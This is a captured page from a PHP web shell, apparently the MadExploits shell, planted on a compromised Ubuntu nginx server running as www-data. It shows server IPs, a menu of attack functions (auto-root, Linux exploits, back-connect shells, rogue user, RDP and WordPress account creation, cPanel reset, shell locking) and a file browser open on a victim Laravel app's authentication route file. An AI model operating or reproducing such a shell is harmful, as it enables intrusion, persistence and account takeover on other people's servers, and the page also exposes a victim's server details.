Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
app /
Modules /
Auth /
Routes /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitkeep
0
B
-rw-rw-r--
api.php
1.86
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.php
<?php use App\Modules\Auth\DTO\LoggedUserDTO; /* |-------------------------------------------------------------------------- | API Routes |-------------------------------------------------------------------------- | | Here is where you can register API routes for your application. These | routes are loaded by the RouteServiceProvider within a group which | is assigned the "api" middleware group. Enjoy building your API! | */ Route::group(['prefix' => 'v1'], function(){ Route::group(['prefix' => '/{type}'], function () { Route::post('/login', ['uses' => 'AuthController@login']); Route::get('/logout', ['uses' => 'AuthController@logout']); Route::post('/activation/{token}', ['uses' => 'AuthController@business_activation']); Route::post('/forgot-password', ['uses' => 'AuthController@forgot_password']); Route::post('/reset-password', ['uses' => 'AuthController@reset_password']); Route::post('/update-password', ['uses' => 'AuthController@update_user_password']); Route::get('/get-account-detail', ['uses' => 'AuthController@get_account_detail']); Route::get('/get-school-list', ['uses' => 'AuthController@get_school_list']); }); Route::group(['middleware' => ['client']], function () { Route::group(['prefix' => '/{type}'], function () { Route::post('/get-account', ['uses' => 'AuthController@get_account']); Route::post('/select-account', ['uses' => 'AuthController@select_account']); Route::post('/register-account-user', ['uses' => 'AuthController@register_account_user']); Route::put('/update-account-user', ['uses' => 'AuthController@update_account_user']); Route::post('/check-valid-token',function () { return ['success' => true,'data' => LoggedUserDTO::toJsonResponse(\Auth::user())]; }); }); }); });
Close